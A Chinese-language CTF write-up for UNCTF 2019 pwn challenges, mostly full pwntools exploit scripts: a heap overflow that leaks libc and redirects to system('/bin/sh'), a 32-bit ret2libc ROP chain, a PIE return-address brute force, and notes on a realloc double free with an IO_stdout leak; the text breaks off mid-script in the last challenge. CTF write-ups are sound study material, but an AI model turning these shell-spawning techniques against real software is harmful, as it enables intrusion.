unctf2019 pwn部分题解
babyheap
easy,不讲了
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = 1
host = '127.0.0.1'
port = 10000
context.log_level = 'debug'
exe = '/tmp/tmp.spk5nTEvta/1910245db1406d3eedd'
context.binary = exe
elf = ELF(exe)
libc = elf.libc
#don't forget to change it
if local:
io = process(exe)
else:
io = remote(host,port)
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb)
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
uu32 = lambda data : u32(data.ljust(4, '\x00'))
uu64 = lambda data : u64(data.ljust(8, '\x00'))
lg = lambda name,data : io.success(name + ": 0x%x" % data)
# break on aim addr
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{
{print $1}}'".format(io.pid)).readlines()[1], 16)
gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(io,"b *{}".format(hex(addr)))
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
def c(idx):
sla("Your choice: ", str(idx))
def new(content):
c(1)
sa("Plz input content: ", content)
def edit(idx, size, content):
c(2)
sla("Plz input index: ", str(idx))
sla("Plz input size: ", str(size))
sa("Plz input content: ", content)
def show(idx):
c(3)
sla("Plz input index: ", str(idx))
def free(idx):
c(4)
sla("Plz input index: ", str(idx))
def exp():
new("a"*0x10)
edit(0, 0x18, "a"*0x18)
show(0)
r(0x18)
puts = uu64(r(6))
lg("addr", puts)
libc.address = puts - libc.symbols['puts']
new("a"*0x10)
payload = "/bin/sh;#\x00"
payload = payload.ljust(0x18, "a")
payload += p64(libc.symbols['system'])
edit(1, 0x20, payload)
show(1)
#free(0)
if __name__ == '__main__':
exp()
io.interactive()
babyrop
简单
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = 1
host = '192.25.1.3'
port = 9999
context.log_level = 'debug'
exe = './1910245db1406dc99ea'
context.binary = exe
elf = ELF(exe)
libc = ELF('./libc6_2.23-0ubuntu3_i386.so')
libc = elf.libc
#don't forget to change it
if local:
io = process(exe)
else:
io = remote(host,port)
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb)
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
uu32 = lambda data : u32(data.ljust(4, '\x00'))
uu64 = lambda data : u64(data.ljust(8, '\x00'))
lg = lambda name,data : io.success(name + ": 0x%x" % data)
# break on aim addr
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{
{print $1}}'".format(io.pid)).readlines()[1], 16)
gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(io,"b *{}".format(hex(addr)))
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Full RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
def exp():
payload = flat([
"a"*0x20,
p32(0x66666666)
])
sl(payload)
payload = flat([
"a"*0x14,
elf.plt['puts'],
p32(0x804853d),
elf.got['__libc_start_main']
])
ru("What is your name?")
r(1)
sl(payload)
__libc_start_main = uu32(r(4))
lg("__libc_start_main", __libc_start_main)
libc.address = __libc_start_main - libc.symbols['__libc_start_main']
lg("libc_addr", libc.address)
lg("system", libc.symbols['system'])
lg("bin_sh", libc.search("/bin/sh").next())
payload = flat([
"a"*0x14,
elf.plt["puts"],
libc.symbols['system'],
elf.got['__libc_start_main'],
libc.search("/bin/sh").next()
])
sla("What is your name?\n", payload)
if __name__ == '__main__':
exp()
io.interactive()
soeasypwn
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = True
# Set up pwntools for the correct architecture
exe = "./" + 'pwn'
elf = context.binary = ELF(exe)
host = '101.71.29.5'
port = 10000
#don't forget to change it
context.log_level = 'debug'
libc = elf.libc
if local:
io = process(exe)
else:
io = remote(host,port)
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb, timeout=1)
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
uu32 = lambda data : u32(data.ljust(4, '\x00'))
uu64 = lambda data : u64(data.ljust(8, '\x00'))
lg = lambda name,data : io.success(name + ": 0x%x" % data)
def debug(addr,PIE=True):
if PIE:
text_base = int(os.popen("pmap {}| awk '{
{print $1}}'".format(io.pid)).readlines()[1], 16)
gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
else:
gdb.attach(io,"b *{}".format(hex(addr)))
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
def exp():
ru("Welcome our the ")
leak = int(r(5),10)
lg("leak", leak)
#debug(0x902)
addr = hex(leak) + "19CD"
addr = int(addr, 16)
lg("addr", addr)
#gdb.attach(io)
payload = 'a'*0xc + p32(addr) + '\x00'
sa("So, Can you tell me your name?", payload)
payload = '\x00'
sa("(1.hello|2.byebye):", payload)
r()
r()
if __name__ == '__main__':
while True:
try:
exp()
io.interactive()
break
except Exception as e:
io.close()
io = process(exe)
这里有个小细节,r()两次,
Box
漏洞点
数组index是可以输入负数的,就是不会利用,后面看了萝卜师傅的wp才知道可以直接改IO_stdout
我是傻逼!这都想不到
然后有个double free,新点记录下
- size == 0 ,这个时候等同于free
- realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
- malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
- malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉
所以利用这个点第一次可以用普通的
- free(ptr)
- realloc(ptr,0)
这就是double free
漏洞利用
- 利用IO_stdout泄露libc地址
- 利用double free改realloc为one_gadget
准备工作
def c(idx):
sla("Your Choice: ", str(idx))
def new(idx, size):
c(1)
sla("Box ID: ", str(idx))
sla(